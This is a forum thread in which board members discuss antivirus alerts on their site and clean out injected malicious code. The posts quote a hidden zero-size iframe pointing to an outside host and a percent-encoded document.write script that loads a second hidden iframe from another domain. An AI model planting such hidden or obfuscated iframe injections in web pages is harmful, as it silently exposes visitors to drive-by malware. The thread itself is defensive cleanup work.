Jump to content

Webshield alert!! Toontastic is a danger to your computer.


Park Life
 Share

Recommended Posts

  • Replies 85
  • Created
  • Last Reply

Top Posters In This Topic

Yep - I've seen the thread over at N-O too....

 

Not experienced it myself but there's enough of you reporting stuff to know it's not isolated. My initial instincts are that it's something to do with the server - going to need to run this one past Pud I'm afraid...

 

 

Reaction time 48hrs. :lol:

 

Wrong

Link to comment
Share on other sites

yeah i'm right

 

you've an iframe loading on pages

 

<iframe src="http://evesteam.net/dl/un/index.php" frameborder=0 width=0 height=0></iframe>

 

 

just need to upgrade your Invision board or apply the patch i guess there was one released about 6-7months ago for 2.3.5 and under

and code for loading the iframe is probably held in the script/page containing the footer info for the copyright and all that shite

 

 

Thanks for that one Ant. I'm having to wrack my brains but I do seem to recall we had something similar in the early days on this board. What I had to do back then was download the entire code, run a grep to find the weblinks (i.e. evestream.net) and remove it. Upload the modded files and hey presto, all OK.

 

I suspect this is tied in with the spam we've been getting and no doubt what has happened is that someone has clicked one of the links which has set the worm off.

 

Cunts aren't they?

Link to comment
Share on other sites

Thanks to Ant, I've found the spurious web link and removed it. Parky (et al) can you please test and advise?

 

Safari back to normal.

 

Will let you know pc/vista/avg a bit later.

 

Thank you. :lol:

Link to comment
Share on other sites

Might be worth doing the upgrade anyway - just to be safe. Sounds like we were lucky this time

 

I know I'm volunteering Craig / Peter / someone for some work - but I dont mind helping out myself if needed.

 

We could suspend posting for an hour or two whilst the upgrade happens?

Link to comment
Share on other sites

doubt it would even take an hour or two, upgrades on these sorts of forums tend to be fairly quick and painless changes aren't normally in the files where your settings are stored, or they get merged in with a script etc, and going from 2.3.1> .6 at a guess i'd say would be changing a lot of files you don't tend to go anywhere near

 

at worst prob just a matter of suspending for 20mins and uploading maybe a mb of files over the older ones.. minus your style/theme settings if you even have to worry about that.

 

whether pp etc need a new/renewed license for the new version i don't know and they can be pricey pending on which is required

 

I'm sure that's how long it would take. I was suggesting an hour to allow for the inevitable fuck up. Also, it would allow time to export content, import on a local machine (after screening the sql dump for the injected code) to a clean version of the board software, test it's worked and then replace the version on the live domain. That way, the compromised version is removed completely.

Link to comment
Share on other sites

Fingers crossed it's gone again...

 

and even bigger fingers crossed, it won't be coming back. If it does this time, I seriously haven't got a clue.

Link to comment
Share on other sites

Yep - I've eradicated the problem, that's why :lol:

 

No-one's getting it now.

 

Hate to be a kill joy but i still am unfortunately. Its not the end of the world for me, im naive to it all i just tend to click ignore but thought id let you know the problem is still around.

Link to comment
Share on other sites

Yep - I've eradicated the problem, that's why :lol:

 

No-one's getting it now.

 

I beg do differ I'm afraid, although I haven't cleared out my cache yet. That said, I wasn't getting it yesterday and am today so fairly certain no amount cache clearing will make any difference.

Link to comment
Share on other sites

Hmmmm - i found this imbedded in the board header/footer wrapper.....

 

<script type="text/javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%61%66%6D%2E%63%6E%2F%64%6C%6C%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>

 

I haven't got a scooby and what concerns me more is I've locked down those files for edit so I can't understand how they've been changed. I've deleted this shit so hopefully it'll be behaving once more for you guys.

 

BTW - if anyone has an ideas as to what the fuck that code is all about, I'd be grateful.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.